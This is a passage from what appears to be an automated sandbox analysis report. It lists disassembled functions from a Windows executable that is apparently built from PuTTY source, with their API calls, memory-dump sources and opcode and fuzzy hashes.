                    • Instruction Fuzzy Hash: 6B11C6726101169BD734AB24DD86ABB77ECEF05314B10417AE516D7241EF74ED08D750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C68AFB Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C63052: GetLastError.KERNEL32(?,?,00C559E8,?,?,?,?,00C5DBC7,00C5DB94,?,?,?,?,?,00C5DB94,?), ref: 00C63056
                      • Part of subcall function 00C63052: SetLastError.KERNEL32(00000000,00C5DB94,?,?,?,?,?,00C5DB94,?,00000000,?,00000003,00C5149B), ref: 00C630F8
                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00C68798,00000000,00000000,?), ref: 00C68B27
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorLast$InfoLocale
                    • String ID:
                    • API String ID: 3736152602-0
                    • Opcode ID: 9c4c28f5f3d5cdc2d9ccb205346d1f079d32531ee5ca3767c0caf2e23c5e041b
                    • Instruction ID: fb9cce9697b50960a0cb6875b1e85641de479f40c3b7ddc174c1590b2598e177
                    • Opcode Fuzzy Hash: 9c4c28f5f3d5cdc2d9ccb205346d1f079d32531ee5ca3767c0caf2e23c5e041b
                    • Instruction Fuzzy Hash: 3EF0F472600112AFDB385A208C86BBA7768EB80754F044528EC26A3184EE74FE49C6D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD4230 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON
                    Download Yara Rule
                    APIs
                    • CoCreateInstance.OLE32(00C7E914,00000000,00000001,00C7E904), ref: 00BD4275
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: CreateInstance
                    • String ID:
                    • API String ID: 542301482-0
                    • Opcode ID: 3ccaa0f6738d69597e1958e4ef3e59d34f72c0050e2e52b3732f5305e96fe029
                    • Instruction ID: 1b99c7c3d589a6cb9f1f1951a094841a48b3eff94123f913f3628017f9fc6454
                    • Opcode Fuzzy Hash: 3ccaa0f6738d69597e1958e4ef3e59d34f72c0050e2e52b3732f5305e96fe029
                    • Instruction Fuzzy Hash: 2401D674B54300AFCB04AB24EC5AB2EB7E5EF9D705F40446DF44A8B391EB719914DA13
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C687CF Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C63052: GetLastError.KERNEL32(?,?,00C559E8,?,?,?,?,00C5DBC7,00C5DB94,?,?,?,?,?,00C5DB94,?), ref: 00C63056
                      • Part of subcall function 00C63052: SetLastError.KERNEL32(00000000,00C5DB94,?,?,?,?,?,00C5DB94,?,00000000,?,00000003,00C5149B), ref: 00C630F8
                    • EnumSystemLocalesW.KERNEL32(00C6882E,00000001,?,?,-00000050,?,00C6832F,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00C68819
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    • API String ID: 2417226690-0
                    • Opcode ID: 858a8a542f4761e996a7a298b24efac6d6f1191def53490d4ae6dc5127241e2c
                    • Instruction ID: 19c3fb3e9956d63b0bb8e548bb805f9b941b9172c5d7d8880d075ea8b5e4dda1
                    • Opcode Fuzzy Hash: 858a8a542f4761e996a7a298b24efac6d6f1191def53490d4ae6dc5127241e2c
                    • Instruction Fuzzy Hash: 0FF02D362003045FCB345F39ACC1A6A7B90EF80328B18863CF9068B681CBB1AD02CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C62ED5 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C62FC3: EnterCriticalSection.KERNEL32(?,?,00C643B5,00000000,00CAF5B8,0000000C,00C6436D,?,?,00C65C07,?,?,00C631F0,00000001,00000364,?), ref: 00C62FD2
                    • EnumSystemLocalesW.KERNEL32(00C62EC8,00000001,00CAF4B8,0000000C,00C6262C,-00000050), ref: 00C62F0D
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: CriticalEnterEnumLocalesSectionSystem
                    • String ID:
                    • API String ID: 1272433827-0
                    • Opcode ID: 83e93cd530893a6f5bd7548d63bcb12e104e92d5401282108a05c3e788086078
                    • Instruction ID: 2dc1008eddc131fa9ceef6111473be37074c6f4a558d013a3106219a1a51b1bb
                    • Opcode Fuzzy Hash: 83e93cd530893a6f5bd7548d63bcb12e104e92d5401282108a05c3e788086078
                    • Instruction Fuzzy Hash: 2EF0A936A00610DFDB00EF98E842B8E77F0FB08365F00462AF410DB2A1CB7549008B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C68903 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C63052: GetLastError.KERNEL32(?,?,00C559E8,?,?,?,?,00C5DBC7,00C5DB94,?,?,?,?,?,00C5DB94,?), ref: 00C63056
                      • Part of subcall function 00C63052: SetLastError.KERNEL32(00000000,00C5DB94,?,?,?,?,?,00C5DB94,?,00000000,?,00000003,00C5149B), ref: 00C630F8
                    • EnumSystemLocalesW.KERNEL32(00C6894E,00000001,?,?,?,00C6838D,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00C6893A
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    • API String ID: 2417226690-0
                    • Opcode ID: f73477551e99ff8280096b3a30ecc8ba3a4094447f90b2b711d86c2259026951
                    • Instruction ID: c316e87530410785c4132b4b8e971f9a035c5e1abedf6f511d47f7d520901a63
                    • Opcode Fuzzy Hash: f73477551e99ff8280096b3a30ecc8ba3a4094447f90b2b711d86c2259026951
                    • Instruction Fuzzy Hash: A2F02B3A30020597CB249F35DC9577ABF94FFC1734B064168EA5ACB651CA719A47C760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BBA910 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: KeyboardState
                    • String ID:
                    • API String ID: 1724228437-0
                    • Opcode ID: a681c69e5c95483b525172ec7a840a16f6182f56e210341b7b1af5497dbbb0e4
                    • Instruction ID: 4c64903bf9b28f248f3afed5c1e648708da23269bd1b1b0ac0e7c689799317dc
                    • Opcode Fuzzy Hash: a681c69e5c95483b525172ec7a840a16f6182f56e210341b7b1af5497dbbb0e4
                    • Instruction Fuzzy Hash: CEE09BB0B042408FD7309B79D8C57EB3BE4575A310F050559D5CA86140C6B85444E343
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C62787 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00C5BBF5,?,20001004,00000000,00000002,?,?,00C5AB08), ref: 00C627BB
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: InfoLocale
                    • String ID:
                    • API String ID: 2299586839-0
                    • Opcode ID: df77569bc0487fd672318bd2e7d765a1b04a4079ae7e1105f91a7e23aafaa6d1
                    • Instruction ID: f9402d5caa5a9d3b94e641ef3b2d5bcb534d1240397d961bcd48f67e3fd9aaa1
                    • Opcode Fuzzy Hash: df77569bc0487fd672318bd2e7d765a1b04a4079ae7e1105f91a7e23aafaa6d1
                    • Instruction Fuzzy Hash: 55E04F31500928BBCF222F61EC44F9E3E19EF44B50F044010FC0566124CB328920EAD5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BBB1F0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                    • FindResourceA.KERNEL32(00000000,000007D0,000007D0), ref: 00BBB213
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: FindResource
                    • String ID:
                    • API String ID: 1635176832-0
                    • Opcode ID: 918d4d2bf8812542fe200a68d1620d6cd8b906d7808e9d6739dc619f05f6ba3a
                    • Instruction ID: f588e2976cac652beb9b7ff99cd31df52f6d07468ed0c0d6b2e02a849799eaa6
                    • Opcode Fuzzy Hash: 918d4d2bf8812542fe200a68d1620d6cd8b906d7808e9d6739dc619f05f6ba3a
                    • Instruction Fuzzy Hash: A8D05E746582C09BE7099B75ECB9B6E3AA16702304F484159FC06DBAE0C3E5E4409F44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C1F1E0 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                    Download Yara Rule
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/mpint.c, xrefs: 00C1F215
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/mpint.c
                    • API String ID: 0-3220216471
                    • Opcode ID: bd60c4135d817aa74e0b4e0ad882f992be62d207fc82f05674e25ab20b54e616
                    • Instruction ID: 754bf52be89c685418f404534e3841955ac28733a348eefac6b5fe36d51ea434
                    • Opcode Fuzzy Hash: bd60c4135d817aa74e0b4e0ad882f992be62d207fc82f05674e25ab20b54e616
                    • Instruction Fuzzy Hash: E731F47AA083098FD320DE90C88076A73E1FBCA314F19847DED995B341E771ED42AB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C130B0 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: file format error
                    • API String ID: 0-2250856019
                    • Opcode ID: f7d5464dad482620f35ce741ac64f771e05243c83644210f1b0f50e37724598e
                    • Instruction ID: cae57a63a65e2b8eb4bbb90d8b29bde601be596ddbb0933bfb9a3da1f4f1c66d
                    • Opcode Fuzzy Hash: f7d5464dad482620f35ce741ac64f771e05243c83644210f1b0f50e37724598e
                    • Instruction Fuzzy Hash: 3DF024716482C82EC638195D6C852F6FBA6E75331CF28107AE09656200DA1EDFC6B696
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C62FF1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: HeapProcess
                    • String ID:
                    • API String ID: 54951025-0
                    • Opcode ID: 31dabbd804b79e22d08b453c5bd5c763fba360e1d00ce3ebde3207139512fd18
                    • Instruction ID: bf806d52f23b0bb896984670b3a2a6850a21817e3f6ebdc57dbc7180cd1104e7
                    • Opcode Fuzzy Hash: 31dabbd804b79e22d08b453c5bd5c763fba360e1d00ce3ebde3207139512fd18
                    • Instruction Fuzzy Hash: 27A01230200140CB43008F355A0430D35E8550158070480256006C6060D62484004F01
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C3C120 Relevance: .9, Instructions: 886COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 20f0e32c75a54261df172588fd66ff17c538ca5c1f42e028264228185c16b4b9
                    • Instruction ID: e79ad44f729b3812b51a5ce406cd63498293edc9073328afc7115b8fba930147
                    • Opcode Fuzzy Hash: 20f0e32c75a54261df172588fd66ff17c538ca5c1f42e028264228185c16b4b9
                    • Instruction Fuzzy Hash: 03725FB1A083809FD324DF18D885B9BBBE4AF89314F04492DFA9D97342D734E954CB96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C3D080 Relevance: .9, Instructions: 859COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d2d0734947055704cdfe7d54bf8a3df0cc3e2e7c628da723240298f4e5b72f8f
                    • Instruction ID: 9cfbfc3480245f7a63c4677492c67f5f7ebfd423538976f32a31a6bfb1c00187
                    • Opcode Fuzzy Hash: d2d0734947055704cdfe7d54bf8a3df0cc3e2e7c628da723240298f4e5b72f8f
                    • Instruction Fuzzy Hash: 228227759053198FC320DF4DC880615FBE5FF88328F6AC4AD95989FB12D6B2E9578B80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BC0E90 Relevance: .6, Instructions: 616COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 560852c2bcc00450708f7ce2f025181bde8866cfffd3cc94bab6da74ef015684
                    • Instruction ID: dc7407d94d734804e94efc670f21659045f3bad314a49d976659278978493d40
                    • Opcode Fuzzy Hash: 560852c2bcc00450708f7ce2f025181bde8866cfffd3cc94bab6da74ef015684
                    • Instruction Fuzzy Hash: 954265716042808FD714DF18C488B997BE2FB86318F2849BDE549AF392D7B3AD46CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C2E800 Relevance: .6, Instructions: 582COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5bfd5cd9bdd4b37e4c268bfe2b63978bf835b5d69f061fad5bf429210c938492
                    • Instruction ID: 5f2b802596122b37c4bffed4c21cac8d1779620710bcb522789f77acc2566a49
                    • Opcode Fuzzy Hash: 5bfd5cd9bdd4b37e4c268bfe2b63978bf835b5d69f061fad5bf429210c938492
                    • Instruction Fuzzy Hash: ED12BF7070C3648BD341EF6EC89052ABBE2EF89601F56492DF6C987352D631EC15DB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BEB030 Relevance: .6, Instructions: 572COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7f2804403c51e157750d2287fcde7dd57b8ed0e5a056311132beea16f5df39e9
                    • Instruction ID: 67023dba6f9e2e3f3fe02310763c822cabce645c56a79c82db1cede863423d72
                    • Opcode Fuzzy Hash: 7f2804403c51e157750d2287fcde7dd57b8ed0e5a056311132beea16f5df39e9
                    • Instruction Fuzzy Hash: 843237B0601A41CFCB28CF1AC094A67B7E1FF88324F5587ADE99A4B395D731E854CB85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BEA2D0 Relevance: .5, Instructions: 526COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 764a698017c6f65b537bd75e40da92c9781e744e754f47fa6fb4680ee3ea6c61
                    • Instruction ID: 1d3340a690464fadcdff7cc4855d1a8df7acd61731d05e39a1560029b8f82d92
                    • Opcode Fuzzy Hash: 764a698017c6f65b537bd75e40da92c9781e744e754f47fa6fb4680ee3ea6c61
                    • Instruction Fuzzy Hash: 9932D1B46047458FC728CF1AC080A56BBF5FF88710F158AADE89A8B751D731E984CF92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BC0030 Relevance: .5, Instructions: 516COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7c229e466ae1874834a791bdb4f6e6396bbec919651088c97eaa8f3f94fff51c
                    • Instruction ID: f9bc78e9ba63a92407c4e88f4a1d29aeba5c16d5aed0349923be0cd03bc68b53
                    • Opcode Fuzzy Hash: 7c229e466ae1874834a791bdb4f6e6396bbec919651088c97eaa8f3f94fff51c
                    • Instruction Fuzzy Hash: 8902AC71A183419FD724DF28C881BABB7E1EF88314F14886DF99997391D735E858CB42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C4A3F0 Relevance: .4, Instructions: 445COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
